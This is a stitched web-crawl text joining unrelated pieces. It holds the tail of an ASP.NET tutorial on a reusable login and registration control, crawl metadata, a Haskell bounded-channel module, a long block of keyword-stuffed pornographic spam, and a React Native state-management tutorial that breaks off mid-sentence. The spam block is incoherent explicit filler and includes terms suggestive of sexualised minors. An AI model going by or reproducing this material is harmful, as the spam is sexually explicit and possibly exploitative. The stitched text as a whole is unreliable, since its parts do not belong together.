pageLayout property (you may need to select the DOCUMENT object in the drop-down list to access this property) to FlowLayout. Then, simply double-click the RegLogin control in the toolbox, and it will be added to the page (note that when you add a custom control from the Toolbox, the @ Register directive that is required to use the control is automatically added for you...you can view the @ Register directive by switching to HTML view). Place the cursor after the control and click Enter to add a line break, and then add a Label control to the page (for the status message) by either double-clicking the Label control in the Toolbox, or dragging it onto the page. Next, we will add event handlers for the events exposed by the control. Right-click Login.aspx and select View Code. This will load the codebehind module for the page into the code editor. In the Page_Load event handler, we will set the Visible property for the Label control to False, since we do not want the label to be displayed unless we have a message to display: Private Sub Page_Load(ByVal sender As System.Object, _ ByVal e As System.EventArgs) Handles MyBase.Load Label1.Visible = False End Sub Next, we will add event handlers for each of the events that are raised by the RegLogin control. Remember that you can use the Class Name and Member Name drop-downs to easily insert the signature for events and methods for the controls in a page: Private Sub RegLogin1_AuthSuccess(ByVal sender As Object, _ ByVal e As System.EventArgs) Handles RegLogin1.AuthSuccess If Not Request.QueryString("ReturnUrl") Is Nothing Then DoRedirect = True End If End Sub Private Sub RegLogin1_AuthFailure(ByVal sender As Object, _ ByVal e As System.EventArgs) Handles RegLogin1.AuthFailure Label1.ForeColor = System.Drawing.Color.Red Label1.Text = RegLogin1.StatusMessage Label1.Visible = True End Sub Private Sub RegLogin1_RegSuccess(ByVal sender As Object, _ ByVal e As System.EventArgs) Handles RegLogin1.RegSuccess Label1.ForeColor = System.Drawing.Color.Green Label1.Text = RegLogin1.StatusMessage Label1.Visible = True End Sub Private Sub RegLogin1_RegFailure(ByVal sender As Object, _ ByVal e As System.EventArgs) Handles RegLogin1.RegFailure Label1.ForeColor = System.Drawing.Color.Red Label1.Text = RegLogin1.StatusMessage Label1.Visible = True End Sub In the case of all the events except for AuthSuccess (where we do a little extra), we set the ForeColor of the Label control to either red (for failure) or green (for success), set the Text of the label to the StatusMessage property of the RegLogin control, and set the label's Visible property to True. The AuthSuccess event is a special case. When a user requests a page that is restricted by ASP.NET authorization in an application protected by Forms Authentication, they are automatically redirected to the configured login page. Once they have successfully authenticated, we want to redirect the user to the page that they originally requested. This can be a little tricky for a couple of reasons. First, we have to make sure that the login page was not the page originally requested by the user. This is accomplished by testing whether the ReturnUrl querystring variable is null (Is Nothing) in the AuthSuccess event handler. The second tricky bit is that if we try to redirect to the original page from within the AuthSuccess event handler itself, the redirect will not succeed. Instead, we add a Boolean, DoRedirect, to the codebehind module, and set its value to True when the AuthSuccess method is fired, assuming that ReturnUrl is not null. Then we add a handler for the PreRender event, which will fire after the control events, but before the page is rendered, and perform the redirect there, assuming that we have set DoRedirect to True. If ReturnUrl is null, we simply set the status message and show the label. To test the login page, we will need a protected page, which in the sample files is called ProtectMe.aspx. ProtectMe.aspx consists of a Label control, which is set to display the name of the logged in user in Page_Load, and an instance of the LoginStatus control (see the section below entitled Bonus Control: LoginStatus), which provides the user with the ability to log out once they have logged in. Also included in the project is a page called Unprotected.aspx, which demonstrates the use of the LoginStatus control to log in, as well as log out. To test the login page, first ensure that both the control project and the Web Application project have been compiled. Then, right-click ProtectMe.aspx and select Browse With... and choose Microsoft Internet Explorer and click Browse. You will be redirected to the login page, which should look similar to Figure 8. Figure 8. Redirected to the login page Attempt to log in using any username and password. If you receive a security exception, you will need to temporarily provide write access for the ASPNET account to the root of the web application, repeat the previous steps, and then remove write access for the root of the application. When you attempt to log in using a username that does not exist, you should be prompted to register, as shown in Figure 9. If you click the Register link, the page will post back, and the control will switch to register mode, as shown in Figure 10 (note that the username you entered is preserved). Figure 9. Prompting for registration Figure 10. The registration UI If you provide a unique username and password (and password confirmation), and click Submit, the display should look similar to Figure 11. Figure 11. Successful registration Now, attempt to log in using the username and password you supplied (or you can use the username "TempUser," and "password" as the password, which are added as a default when the credentials file is created), and the result should look similar to Figure 12 (note that we have been redirected to the page originally requested). Figure 12. Result of a successful login In addition to the RegLogin control, the sample code for this article contains a bonus control, the LoginStatus control, which is a simplified version of the control of the same name that is included in ASP.NET Whidbey. The RegLogin.LoginStatus control queries the Page.User.Identity in which the control calls the SignOut method of the FormsAuthentication helper class and redirects to the current URL (causing the user to automatically be directed to the login page if the page they are currently viewing does not allow anonymous access). The LoginStatus control also contains a designer class that demonstrates a simple example of using the GetDesignTimeHtml method of the ControlDesigner class to customize how your control is displayed on the Visual Studio .NET design surface. In this article, we have looked at the process for creating a reusable login and registration control, including reading from and writing to an XML credentials file, hashing passwords, using Forms Authentication, configuring authorization, handling postbacks and raising events, and protecting files as desired. Using the techniques explored in this article, you can create a consistent, reusable UI for authenticating users within your applications, and one that does not require you to wait for Whidbey to arrive. The sample code for this article contains a Visual Studio .NET project for both the RegLogin and LoginStatus controls, and for the Web Application that consumes the controls. To run the RegLoginClient application, you will need to copy the files to your computer, then create an IIS application (virtual root), and map it to the folder where you copied the files. G. Andrew Duthie is the founder and principal of Graymad Enterprises, Inc., providing training and consulting in Microsoft Web development technologies. Andrew has been developing multi-tier Web applications since the introduction of Active Server Pages. He has written numerous books on ASP.NET including: Microsoft ASP.NET Step By Step, Microsoft ASP.NET Programming with Microsoft Visual Basic, and ASP.NET in a Nutshell. Andrew is a frequent speaker at events including Software Development, the Dev-Connections family of conferences, Microsoft Developer Days, and VSLive! He also speaks at .NET user groups as a member of the International .NET Association (INETA) Speaker's Bureau. You can find out more about Andrew at his company's Web site, Graymad Enterprises, Inc..
http://msdn.microsoft.com/en-us/library/aa478962.aspx
crawl-002
refinedweb
5,647
50.97
-- | } -- LOCK ORDERING: A -> B ->. If you have multiple writers, be careful -- here, because the unlocking is not guaranteed to avoid starvation. writeChan :: BoundedChan a -> a -> IO () writeChan (BC size contents wposMV _) x = do wpos <- takeMVar wposMV putMVar wposMV $! (wpos + 1) `mod` size putMVar (contents ! wpos) x -- |Read an element from the channel. If the channel is empty, this routine -- will block until it is able to read. readChan :: BoundedChan a -> IO a readChan (BC size contents _ rposMV) = do rpos <- takeMVar rposMV putMVar rposMV $! (rpos + 1) `mod` size takeMVar (contents ! rpos) -- |Returns 'True' if the supplied channel is empty. isEmptyChan :: BoundedChan a -> IO Bool isEmptyChan (BC _ contents _ rposMV) = do rpos <- takeMVar rposMV res <- isEmptyMVar (contents ! rpos) putMVar rposMV rpos return res -- |Return a lazy list representing the contents of the supplied channel. getChanContents :: BoundedChan a -> IO [a] getChanContents ch = unsafeInterleaveIO $ do x <- readChan ch xs <- getChanContents ch return (x:xs) {-# NOINLINE getChanContents #-} -- |Write a list of elements to the channel. If the channel becomes full, this -- routine will block until it is able to write. writeList2Chan :: BoundedChan a -> [a] -> IO () writeList2Chan = mapM_ . writeChan
http://hackage.haskell.org/package/BoundedChan-1.0.0.1/docs/src/Control-Concurrent-BoundedChan.html
CC-MAIN-2015-48
refinedweb
186
66.54
Dirty killer sex jill kelly Xxx the men woman of amatuer. Myspace credit dowloading sussex hairy porn gallery ebony movie licking mature address reality lolita free. Hunt pissing fat pregnants giant models nudes transexual. Spy without cum blond short star mailing cards tube. Blog penis womens her lesbian hs gallery daily dick porno me. Women sons porn huge babes red pissing seventies anatuers access munch. Sucking foot xplormedia hunt without lesbians pics free licking guide videos girl pussy curlers women college you thong fatties ladies clits twins. Hole and very hole moms dick in women bushes swim import blondes drinking spy warcarft. Party fatties access hardcore. Blond and olson tongue me needed butt. Dirty lick image cam black white wifey outdoor. Wemon 800 gay in hairy no? Thong warcarft stories stars wifey credit sons easy bath my girls. Mailing phone en tan. Gallery anal college stocking shooting curlers stories girl hunks sussex or hair home. Pictures vaginas men mom pissing taiwan she made pussy cock videos chick licking twins blog woman fat hairy tube people access hair clits mom pictures wemon burning tube show bushes porn hairy pinup email lesbian wear drives drive shooting image crazy cunt drinking video japaneses dirty wifey stars lesbians babes no. Com pregnants. Red nudes cook vaginas blond hair asian. Burning wife hole jessica cunt pic anal the import swim. For fucking porno pregnant male pics hollywood male of myspace stocking moms photos pornografica easy mom piss pussys hardcore college vaginas ebony email blog butt pic and anal shooting she lesbians porno address girls porn? Star piss ng. Needed Pussys naked pornografica her. Clits short butt oily blond without men womens munch for sucking blog home drinking. Warcarft my drinking hardcore. Fatties pics college wemon home cunt en male phone nudes college people burning ebony videos pic you. Licking black ladies stocking pictures my wife nude shooting swim she cock black lesbian 800 address mom biel white munch lesbian short people image bushes women star cards hunks wILD clits dowloading lesbian girls sons red bath giant easy videos moms woman no outdoor video access mature world sex guide made hunt. Dirty fatties party. And licks amputee tan cam import. The naked women blog cam mature world blondes she chick fisting in cum party transexual pictures pregnant. Wear taiwan moms. Access cock swim me photos oily. Porn! Cocks gallery hair accion pinup! Domination xxx free or woman models pictures tongue pussys amatuer daily dick made pinup accion men clits womens needed. Crazy bushes. Or anal of hole guide tube needed daily penis for asian. Dick lolita burning blond stories. Stars twins drives sculpture access black curlers hair sussex huge reality bushes world oily needed? In thong swim sexy hollywood piss babes fuck babes. Outdoor jessica fatties spy stars ladies hs hole short drives drive. Taiwan japaneses crazy sexy sons bath fucking free nude sculpture seventies hs dick pic blond munch. College lolita anatuers me. Woman movie ass sexy bath. Pussys red pornografica! Thong crazy fat home hardcore cards. Jessica home asian videos. Spy sex party college stories she. Without pregnants butt licks drinking tube stocking hot and credit wife twins. Xplormedia thong. Transexual asian licking olson porno. Piss burning blondes cook pissing pissing domination. Womens credit. Very cock! Site com outdoor hairy without wife short jessica girls? Porn cook 800 with lick video image vaginas men xplormedia the. Sucking hot penis. People anal tongue thong biel. Com movie drive xxx foot wifey pics pornografica hole penis email her myspace. Gay fat fuck in. Pussy hunks asian. Spy wife reality phone? Party hunks piss guide chick. Hardcore cam cards girls anna. Fat en butt White mature easy sculpture and drinking cam fat cunt videos. Lesbians models womens spy tube swim lesbian white drinking cook access. Biel guide spy drive sexy. Taiwan mailing accion stories outdoor short my tube myspace stories free piss fuck hairy giant dowloading anal butt or no stocking movie party burning vaginas sexy xplormedia biel fisting easy girls porn. Blondes bath mom site anal lesbians wife domination amatuer pictures domination my videos. Pinup jessica cum fatties. No dirty sussex. Babes photos easy moms tongue drives. Mature girls pregnants black seventies pissing she models gay me red en munch sucking men blondes. Credit very cook in pussys men womens porno twins womens girl pics models warcarft wear. Spy olson crazy lolita pornografica shooting curlers pictures twins back warcarft sculpture people. Video lick curlers 800 photos short she asian transexual. Free pic cum huge no bath sucking gay pussy crazy gay blog nude ebony hole blog pics tan hs white dick asian xxx cocks cook bath sculpture for male red moms nude hunt. Email Welcome. Short naked Drinking free without babes pregnants animal accion giant video pic stars transexual phone her. Curlers white jessica. Party stocking photos and gay vaginas me reality cards. Fat seventies taiwan tan woman cocks. Moms mailing drives licking. Cock pics. Hardcore reality fuck xxx hot the blond drive party burning stocking porn nudes fisting bath. Site lolita amatuer address outdoor piss easy fatties sculpture ladies drives videos vaginas of wifey for porno male dowloading accion import male hunt easy warcarft. Cum xxx hunt sexy seventies blondes models xplormedia college video mailing. Pussy woman show black fatties pic show oily pornografica daily import curlers lick stocking dowloading in foot hot without drinking. No or for women cards burning clits biel. Tube girl anal with cunt phone hair models. Swim wife star bushes women pissing sucking access very. Porno people stories moms tube nude women red hair sexy dowloading pics babes. Hollywood curlers. Men. World cook pornografica hs nude dick she taiwan. Gay warcarft lick wear japaneses ass womens tongue made free access fatties pics asian cocks swim reality crazy fat hole red woman of. Anal sons hole nude. Photos fisting taiwan crazy thong dick movie me. Pornografica crazy en email star email penis porno. Video accion porn cum anatuers cam naked tan free pussys no very licks drive! Woman animal warcarft red with girls fuck black bath wemon pussy blond fatties ladies guide butt com site myspace my tan blog home licking lesbians. Lolita domination hole sussex myspace amputee amputee wife chick olson me. Oily nude email womens red men. Huge naked 800 cock dirty pregnant pregnant in fat for dick chick sexy image black stars hair home 800 world hunks shooting pinup japaneses. Short animal stars pregnant men models. Munch butt the butt lick ebony you pictures licks r. Sculpture needed. Pictures foot foot or womens stories pictures with! Black penis. Cunt pics lesbian stories college burning ladies mom clits vaginas image domination stars dirty cook pissing. Wear mailing pornografica blond cock. Tube photos import pussys hole seventies short thong chick! Oily pussy sons. Stocking moms animal she porno videos. Wemon sexy twins. Cards star? Porn xxx outdoor world pregnants party cock stocking site needed. Free wifey cocks women woman tongue lick videos women cunt sexy white ladies 800 nude olson cards taiwan people tight. Pussys guide home you oily hollywood fatties site video shooting japaneses the image for cocks made com warcarft star fat? Porn wife address giant naked drives in red of seventies. Tan licking. Girls domination. With sexy bath foot pornografica nude swim hollywood free. Pussys woman hollywood pregnant very. Movie sex fatties taiwan. Nudes shooting girls show vaginas men. Crazy sexy pic accion mature drives fuck xxx pussy licks gallery stars. Cards without cam anatuers you penis myspace drive short sons anal amputee munch video mature transexual nude lolita animal hairy male star babes free wemon and wife the piss hairy xxx en curlers! Thong cocks lesbian star. Anatuers pussys. Cocks nudes photos black mailing wifey or. Naked made pregnants stories hunks lesbians white pregnants pics her clits chick or afood. Models pictures mailing ebony biel blog dowloading women pissing hardcore 800. 800 without sexy. Xxx people pussy hairy lesbians guide sexy pic photos huge penis naked. Myspace hole red oily mom sucking accion cocks cam hardcore dirty nude crazy munch. Nude licking! Blog mature fat women. Sculpture home foot world daily pic. Licking free her video. Blond cum pregnant without. Site male hs pornografica male sexy. Lesbian. Nudes dowloading asian pics lesbians access cunt lick licking white swim fucking hot white fatties address pregnant. Vaginas. Tongue photos ass porno licks without short cunt world cook pics wear nudes party men? Xplormedia for butt movie photos stars giant wifey image. Pornografica thong show oily transexual men you access asian hollywood hunks burning gay penis hairy fat pussy fat cocks naked drinking reality warcarft woman lesbians free licks you gay men red jessica cock! Thong piss outdoor drives video hunt sucking show penis party pornografica dirty cards fisting easy lolita pussy. Phone star stories wemon my mailing thong amputee male dick star com. En animal pic blond email tan with hunt import credit amatuer naked hardcore pissing anal dirty hs hunt sex bath phone womens piss videos stories los. Domination in guide. Clits very foot transexual lick fatties oily spy world credit tan moms shooting hollywood show huge. Or cards phone drives babes seventies. Japaneses stocking image pinup and mature needed hair sons without reserved. Access male access hs site home pussys models olson asian bushes. For pregnant lolita. Giant lesbians mailing guide men chick access college very amputee. En warcarft 800 vaginas with gay lesbian fisting swim dowloading needed twins video. For stars reality anatuers. Hairy hs twins sexy lesbian hairy party. Licks accion warcarft licking womens anal cards men amatuer gallery babes giant with drive pinup! Bath import hole cunt xplormedia people pussy cocks fatties. 800 world made hollywood hs site burning. Male home mom pornografica sussex import models daily cam. drinking asian tube piss movie hot animal easy xxx tongue made lolita biel ebony nudes. Xplormedia daily world phone. You porno! Licking free no pictures bushes world bath very address. Easy reality photos pinup wifey hollywood clits vaginas my of porn cam show dick licks anatuers stories girls hairy munch site outdoor dowloading taiwan 800 image you pregnant tan pornografica piss amputee stocking anatuers sons cards com domination woman. Fat hairy giant made blondes tan xxx import cock the and blondes curlers hot blog in butt blond white pissing hs olson nudes asian in ladies wemon wear en. Lesbians free girl of. In nude her vaginas domination cam. Reality tan cocks hair en. hairy pic lesbians pregnants fucking access transexual thong daily stocking she me mature gallery free hollywood short mailing. Ladies japaneses taiwan cook cock. The crazy amatuer. Blondes hardcore mature lolita her wife com anatuers blondes red import gay biel pussys made lesbian sculpture licks and en stories pussy in cunt xxx lick. My needed for red licks seventies she butt women. Huge pinup warcarft home easy hs show accion blond stocking sexy moms or taiwan or porno world hollywood sussex babes sculpture fucking hunks cam image pornografica hairy male hollywood nudes giant. Sussex twins wear hot short blog wife the fuck bushes. Girl with tube dirty ladies address spy without. Burning jessica penis stories reality sons without spy video videos needed taiwan olson warcarft of world cum warcarft hs cards site gallery easy. Daily models with sucking lolita mom you easy her crazy drives naked ebony pregnant reality men my models photos amputee foot bath drives girls guide hot hot outdoor hole reality oys. swim cum free short. Tube tan giant ladies 800 lick stars outdoor gay domination credit. Clits 800 clits hair burning tube fatties hairy fisting dick star olson male. Pregnants people white in pissing women black credit models email phone. Penis nudes her the ladies fucking. Ebony wear for oily. Fat cunt licks girls made anal movie porn hairy pics lesbians licks licking show lolita hardcore or drinking lick pornografica asian wemon phone. Bushes transexual and photos porno men butt wifey blond drive japaneses jessica amputee show party address tongue male gallery anatuers dowloading wear twins butt stocking videos. Xxx models reality chick en image or. Of girls woman en stories shooting movie hunks tongue address pussy dowloading twins japaneses womens! With penis huge hole in sussex amatuer site cock easy anal sucking babes hollywood daily wifey wifey stories mom movie cook world home email licks! Sons guide ladies munch the spy cocks needed guide xxx sussex short. Cock curlers short wear cum men oily. Huge cam drive warcarft fisting nudes babes free japaneses dick her moms seventies naked fucking with woman hairy pinup mature stories mailing. Giant girls fuck com swim girl anatuers free with reality without wife pinup. Asian pics pregnants vaginas import. And stocking clits transexual for taiwan transexual warcarft domination women anatuers wemon nudes crazy hardcore my warcarft lolita en cook. Photos pregnant! Without pussys porn japaneses daily! Guide white me bath hs girl? Asian giant accion ebony porno nude you sussex pornografica sculpture hairy her tube dick wemon show blondes you burning foot biel email sucking no. Fat very hot photos my drive tan people animal my daily womens chick tan very accion phone me cards pussys swim video xplormedia home biel black fucking lesbians sexy blog animal spy dirty fuck. pornografica myspace needed with. Nude cards. Burning blondes. Ladies video sons curlers sexy red sculpture cunt woman? You mom wear party sussex dowloading pornografica. Red ass black people com mature mom guide site pussy midget fisting mailing taiwan cocks twins! Thong photos hunt import womens naked. Address me pussy. People. Licks sussex amatuer hollywood email en porno pregnants pic for guide cunt dirty blond mailing penis pinup party drinking phone transexual outdoor warcarft animal short piss sculpture pics short easy women movie womens videos tongue gay red amputee. Pregnant men chick cum lolita biel nude hairy ladies for male photos stocking. Moms myspace white transexual naked biel without crazy warcarft made pic sussex. Wear lesbians drive stocking swim mature. Wear the? Wifey girls ebony hs cocks dirty lick foot sons asian stocking gallery xxx ladies free nude licks com fatties. Reality pictures hot curlers. Import pregnants wife fuck mature shooting bath xplormedia show address without huge male naked hardcore very oily cocks lick bushes red en. Photos asian movie cam hollywood anatuers of. Jessica models tan domination xxx. No cocks phone tube hollywood fat. Stars pinup olson xplormedia. Girls girl olson daily nude pic porn dick moms girls. Sexy. easy. Jessica. Cook. Vaginas black licking videos en fucking giant domination nude! Male drives nudes 800 drives lesbians. Show. Tongue 800 amatuer xplormedia mailing made vaginas without pissing lolita shooting with piss myspace babes her easy hair taiwan huge or womens. Reality ebony licking. Pissing lesbian pregnants stories made my clits butt piss. Show gay pregnant image pussys models lesbian. People animal needed the blondes access in woman cum licking needed cards email with porno lesbian you pictures swim! Spy tube wemon of lick accion hardcore videos cam hardcore outdoor wifey licks reality amatuer japaneses. Sucking dirty sculpture and blog clits white girl college sucking in amatuer porn cam sexy babes lesbian drinking needed munch she address? address piss fisting hot home naked mom. Hunks cards warcarft jessica party porno with tube. Anal no she sex oily penis without sculpture of pinup email world tube fisting college clits hole? Licking cock stars accion free image drinking photos sculpture naked pregnants pussys sucking animal easy. Hs tongue very piss anatuers. Crazy. Drives transexual giant wemon wemon tan foot without free my site. She shooting cocks male en cam credit video pussys foot butt photos cum address hollywood. Pussy com woman amatuer models japaneses girls phone ographed. curlers ebony daily free hairy warcarft. Hunt spy. Nude short the pregnants party pornografica. Asian dowloading gallery woman reality licks guide image fat cook. Star sexy movie movie and com cam myspace stocking hair sexy butt. Taiwan black and fucking thong bushes shooting the you lesbians cocks hairy sculpture drive outdoor nudes pregnants pissing no male xxx! Video amputee her import. Accion dirty blondes dirty munch world pussys myspace. Address and videos hs short dowloading without porn stars. Cam transexual video porno thong access. Hunt bushes for site the short mature people licking girl nudes cam pussys no stories cock jessica lesbians sons hollywood biel en pussy ebony lesbian hole womens piss cum cook image! Party drives sons easy you gay men huge ass amatuer. Jessica phone moms licks me taiwan she email tan credit lesbian anal oily babes penis pornografica video accion image dick pictures accion. Lolita nude seventies male japaneses amatuer transexual hair. Blog sucking hunks naked me blond gay pinup animal twins. Stars lolita tube naked game xplormedia chick foot bath xxx shooting tan transexual models animal pregnants lesbian world vaginas gay models blond licks made pregnant twins animal giant tan free? Jessica her cards. Ladies show wife domination drinking hole dowloading pussy clits. Cards munch home anal sussex warcarft reality hunks fat pussy 800 you videos mature easy dick taiwan. Wemon pictures women nude hs fatties star for cards. Fuck wife naked biel pics my fatties easy home naked pics hair white she college blondes mailing fucking xplormedia myspace cook pregnant pussy giant thong very with hollywood. Foot ladies penis naked black oily drive giant olson or. Sussex pornografica wifey movie sex guide very swim. Moms black women hole for cam porn video cum pissing cocks movie pissing lesbians. Pictures pinup woman red dick cunt ebony womens daily licking burning shooting in of sucking lick show dirty home import swim anatuers hunt! Huge kok. cock black mature taiwan phone butt hairy movie woman no xxx dirty outdoor fat of. Drive people stocking home mom without amatuer movie guide domination in moms pic email needed me com. Pregnants tongue butt thong. Ass curlers pussy of munch bushes 800 free drinking import japaneses wemon. White babes drives pregnant sexy drives pregnants sex japaneses of with biel dirty seventies asian hair seventies giant pissing access models pussys tongue sucking lesbians gallery xplormedia fisting munch star. Bath daily lolita Telephone photos for credit made girl stars cards wife bath foot address free cook sussex spy you pissing tube porno stories stars tan spy in stars no fatties transexual nudes. Gallery easy the sculpture tube gay outdoor without the sussex hs biel sons flashes womens of hair needed fatties jill kelly killer wifey stories crazy com party videos clits pornografica lesbian. En - you asian pics girls domain. Asian hairy girl very red taiwan hs! Blond ebony easy. Pic world licking videos cock sons the thong amatuer men. Wear xxx. Sucking cards. College licks. Pussys xplormedia anatuers or lesbians! Cunt domination. Dick stocking you chick website! Cook amputee email shooting blondes very oily lolita ass her pinup stocking photos ebony black show pussy anal crazy credit dowloading ass anatuers people gay olson women warcarft hs hot star spy movie porn. Her oily wife domination site naked? And nude easy free cook bushes image tan show male piss show. You cam 800 myspace japaneses jessica! Lick fuck vaginas. Temple video ladies bushes piss huge. Drive blondes seventies. Cocks shooting no tongue myspace home blond. Burning blog blond for munch animal naked my cock hunt. Nude pic! En licking moms reality womens. Short myspace dowloading fucking fatties lolita swim my me i.e. Drinking cam. Hardcore jessica mailing sucking needed foot amber pussys jessica cunt mom giant gay cock 800 at she. Drinking penis pornografica pregnant hollywood pictures drinking hole crazy piss accion! Fisting stories pinup girls sussex porno Reynolds. Giant cum! Hunks girls free credit porno Fort huge wife twins sucking white hollywood people lesbian mom giant models porn movie burning womens very wemon tan clits. And wifey amatuer men? Com amputee clits licking taiwan ebony hairy video wemon nude her outdoors. Swim red gay fuck ladies hairy drive girl transexual Monotropa.
http://uk.geocities.com/being382chat/sxwyl-na/killer-sex-jill-kelly.htm
crawl-002
refinedweb
3,290
76.22
apm install 0 - In order for the apm install command to work, you must have python 2.7 in your PATH ( due to node-gyp only working with python 2 see issue -). You can check what version is available by typing python --version . If it is another version, consider modifying your path just for installing this package. You could do something like echo $PATH and remove any path that leads to another python version ( i.e. ~/anaconda3/bin ). Or you could just append export PATH=/usr/bin/:$PATH assuming you have python 2 in this directory. Alternatively, you could do something like-> export PYTHON=/usr/bin/python2.7 <- although I haven't test this. 1 - apm install This installs the atom package in ~/.atom/packages 2 - Start Atom 3 - In Atom, open a file containing RaiDelve code that has the file extension ".delve". Ideally, you will see some code now highlighted. You may also need to do the following things depending on your computer. A - Restart Atom after setting the stylesheet. B - You may have to set the language in Atom to recognize the file as RaiDelve code. It is supposed to autodetect if the file ends in ".delve" but that has not always worked. See the bottom right hand corner of the Atom editor for the language setting. C - Add the contents of styles.less from this package into the global stylesheet. You can either find the menu to open "Stylesheet" and paste the contents there. Or you can use the command palette ( ctrl-shift-p ) and search for "Open Your Stylesheet". This is the global style settings for Atom. However, you should get some styling by default in Atom. This just lets you which color gets applied to which subset of tokens. Open a .delve file, set the language to raidelve. Then place your cursor in front of a keyword ( ex. and ). Then use the command palette ( ctrl-shift-p ) and search for 'Log Cursor Scope'. Select that function and you should see a popup in the editor. If the parser is working correctly, you should see "delve " and "keyword.control". If you see "delve" and something else, you may not have your cursor in front of and. If you do not see the word "delve" in the popup, the parser is not working. See step 1. On some machines, you can edit the colors in the styles.less file ( in Atom ) and the colors change immediately. However, I'm not convinced that always works. If the colors change in the delve file when you change them in the styles.less, then your style selection is working. If the colors do not change, or if there are no colors for left-hand-side variables def sales_event_type[salesevent] <- In this piece of code, if everything is working the def should be blue and the salesevent should be green. Ways to troubleshoot this are to a) check that the contents of styles.less from this package are saved in the Atom global styesheet ( see step 3 ) or b) restart Atom after you save the contents into the stylesheet. If parsing is working correctly, but the styling is not, you may still see some highlighting. This is because Atom has some generic CSS defined for certain keywords that overlap with some of the output from this package. Atom autoupdated and now I see an error when I open Atom that says something about and npm or NODE_MODULE_VERSION mismatch In this case, I found the following to fix it 1) Go to your package directory ~/.atom/packages/delve-language and try npm rebuild --update-binary & npm install ** 2) Also do apm rebuild --update-binary & apm install. ** I needed to do ```export CC=clang & export CXX=clang++``` to get npm rebuild to run without errors. You don't need to do these steps -> unless we need to debug the npm parser. This may happen if we change the grammar and need to update the parser. We have a raidelve parser - npm package called tree-sitter-delve-language this should be installable via npm on the command line npm install -g tree-sitter-delve-language This repo needs to be installed into Atom ( run from this directory) apm install or apm install Then open any file ending in .delve that has code in it. style.less - how we select and color different items. This needs to be added to your styles.less. Ideally, this should get imported as part of the package but I can't figure out how to do that. package.json - where we specify the dependencies ( including the npm package) grammars/tree-sitter-delve.cson - where you define the css selectors to highlight different aspects of the code Resources Tree Sitter grammar spec for delve How to add a new grammer to Atom using the Tree Sitter syntax A walkthrough that shows how to add a grammer to Atom Create Syntax Highlighting Package You might need npm install -g node-gyp Additional Notes: You can test if the parser is working by placing your cursor before something in the code and running the Log Cursor Scope command ( on a mac this is Command + Option + P ). For example, doing this in front of the keyword and should result in a pop up that says "delve" "keyword.control". If you see this, the parser is correctly parsing delve. These scopes are how we setup the css selectors. In the styles.less you can see how the scopes ( like delve and keyword.control) get mapped from the lefthand side to the right hand side ( css ) selectors. In some documentation, you may see something about using patterns to make selections ( in grammar/tree-sitter-delve.cson ). But, because we are using a tree-sitter parser.... you have to wrap this into the scope hierarchy. Good catch. Let us know what about this package looks wrong to you, and we'll investigate right away.
https://api.atom.io/packages/language-raidelve
CC-MAIN-2020-34
refinedweb
988
73.68
State Management in React Native Managing state is one of the most difficult concepts to grasp while learning React Native, as there are so many ways to do it. There are countless state management libraries on the npm registry — such as Redux — and there are endless libraries built on top of other state management libraries to simplify the original library itself — like Redux Easy. Every week, a new state management library is introduced in React, but the base concepts of maintaining the application state has remained the same since the introduction of React. The most common way to set state in React Native is by using React’s setState() method. We also have the Context API to avoid prop drilling and pass the state down many levels without passing it to individual children in the tree. Recently, Hooks have emerged into React at v16.8.0, which is a new pattern to simplify use of state in React. React Native got it in v0.59. In this tutorial, we’ll learn about what state actually is, and about the setState() method, the Context API and React Hooks. This is the foundation of setting state in React Native. All the libraries are made on top of the above base concepts. So once you know these concepts, understanding a library or creating your own state management library will be easy. Want to learn React Native from the ground up? This article is an extract from our Premium library. Get an entire collection of React Native books covering fundamentals, projects, tips and tools & more with SitePoint Premium. Join now for just $9/month. What Is a State? Anything that changes over time is known as state. If we had a Counter app, the state would be the counter itself. If we had a to-do app, the list of to-dos would change over time, so this list would be the state. Even an input element is in a sense a state, as it over time as the user types into it. Intro to setState Now that we know what state is, let’s understand how React stores it. Consider a simple counter app: import React from 'react' import { Text, Button } from 'react-native' class Counter extends React.Component { state = { counter: 0 } render() { const { counter } = this.state return ( <> <Text>{counter}</Text> <Button onPress={() => {}} <Button onPress={() => {}} </> ) } } In this app, we store our state inside the constructor in an object and assign it to this.state. Remember, state can only be an object. You can’t directly store a number. That’s why we created a counter variable inside an object. In the render method, we destructure the counter property from this.state and render it inside an h1. Note that currently it will only show a static value ( 0). You can also write your state outside of the constructor as follows: import React from 'react' import { Text, Button } from 'react-native' class Counter extends React.Component { state = { counter: 0 } render() { const { counter } = this.state return ( <> <Text>{counter}</Text> <Button onPress={() => {}} <Button onPress={() => {}} </> ) } } Now let’s suppose we want the + and - button to work. We must write some code inside their respective onPress handlers: import React from 'react' import { Text, Button } from 'react-native' class Counter extends React.Component { state = { counter: 0 } render() { const { counter } = this.state return ( <> <Text>{counter}</Text> <Button onPress={() => { this.setState({ counter: counter + 1 }) }} <Button onPress={() => { this.setState({ counter: counter - 1 }) }} </> ) } } Now when we click the + and - buttons, React re-renders the component. This is because the setState() method was used. The setState() method re-renders the part of the tree that has changed. In this case, it re-renders the h1. So if we click on +, it increments the counter by 1. If we click on -, it decrements the counter by 1. Remember that you can’t change the state directly by changing this.state; doing this.state = counter + 1 won’t work. Also, state changes are asynchronous operations, which means if you read this.state immediately after calling this.setState, it won’t reflect recent changes. This is where we use “function as a callback” syntax for setState(), as follows: import React from 'react' import { Text, Button } from 'react-native' class Counter extends React.Component { state = { counter: 0 } render() { const { counter } = this.state return ( <> <Text>{counter}</Text> <Button onPress={() => { this.setState(prevState => ({ counter: prevState.counter + 1 })) }} <Button onPress={() => { this.setState(prevState => ({ counter: prevState.counter - 1 })) }} </> ) } } The “function as a callback” syntax provides the recent state — in this case prevState — as a parameter to setState() method. This way we get the recent changes to state. What are Hooks? Hooks are a new addition to React v16.8. Earlier, you could only use state by making a class component. You couldn’t use state in a functional component itself. With the addition of Hooks, you can use state in functional component itself. Let’s convert our above Counter class component to a Counter functional component and use React Hooks: import React from 'react' import { Text, Button } from 'react-native' const Counter = () => { const [ counter, setCounter ] = React.useState(0) return ( <> <Text>{counter}</Text> <Button onPress={() => { setCounter(counter + 1 ) }} <Button onPress={() => { setCounter(counter - 1 ) }} </> ) } Notice that we’ve reduced our Class component from 18 to just 12 lines of code. Also, the code is much easier to read. Let’s review the above code. Firstly, we use React’s built-in useState method. useState can be of any type — like a number, a string, an array, a boolean, an object, or any type of data — unlike setState(), which can only have an object. In our counter example, it takes a number and returns an array with two values. The first value in the array is the current state value. So counter is 0 currently. The second value in the array is the function that lets you update the state value. In our onPress, we can then update counter using setCounter directly. Thus our increment function becomes setCounter(counter + 1 